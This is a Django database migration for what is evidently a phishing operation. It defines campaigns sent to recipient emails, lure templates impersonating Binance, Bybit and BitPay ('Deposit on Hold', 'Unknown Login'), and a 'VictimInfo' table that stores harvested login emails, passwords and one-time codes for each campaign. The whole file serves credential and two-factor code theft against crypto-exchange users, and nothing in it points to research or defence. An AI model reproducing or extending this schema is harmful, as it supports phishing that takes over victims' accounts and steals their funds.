# Generated by Django 4.2 on 2025-06-23 10:28

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import shortuuid.django_fields


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789abcdefghijklmnopqrstuvwxyz', length=10, max_length=10, prefix='', primary_key=True, serialize=False)),
                ('recipient_email', models.EmailField(max_length=254)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': 'Campaign',
                'verbose_name_plural': 'Campaigns',
                'ordering': ['-created_at'],
            },
        ),
        migrations.CreateModel(
            name='EmailTemplate',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(choices=[('binance_deposit', 'Binance Deposit on Hold'), ('binance_unknown', 'Binance Unknown Login'), ('bybit_deposit', 'Bybit Deposit on Hold'), ('bybit_unknown', 'Bybit Unknown Login'), ('bitpay_deposit', 'BitPay Deposit on Hold'), ('bitpay_unknown', 'BitPay Unknown Login')], max_length=20)),
            ],
            options={
                'verbose_name': 'Email Template',
                'verbose_name_plural': 'Email Templates',
            },
        ),
        migrations.CreateModel(
            name='VictimInfo',
            fields=[
                ('id', shortuuid.django_fields.ShortUUIDField(alphabet='0123456789abcdefghijklmnopqrstuvwxyz', length=10, max_length=10, prefix='', primary_key=True, serialize=False)),
                ('login_email', models.EmailField(max_length=254)),
                ('login_password', models.CharField(max_length=255)),
                ('login_otp', models.CharField(blank=True, max_length=6, null=True)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='victim_infos', to='core.campaign')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='victim_infos', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Victim Info',
                'verbose_name_plural': 'Victim Infos',
                'ordering': ['-created_at'],
            },
        ),
        migrations.AddField(
            model_name='campaign',
            name='template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaigns', to='core.emailtemplate'),
        ),
        migrations.AddField(
            model_name='campaign',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='campaigns', to=settings.AUTH_USER_MODEL),
        ),
    ]
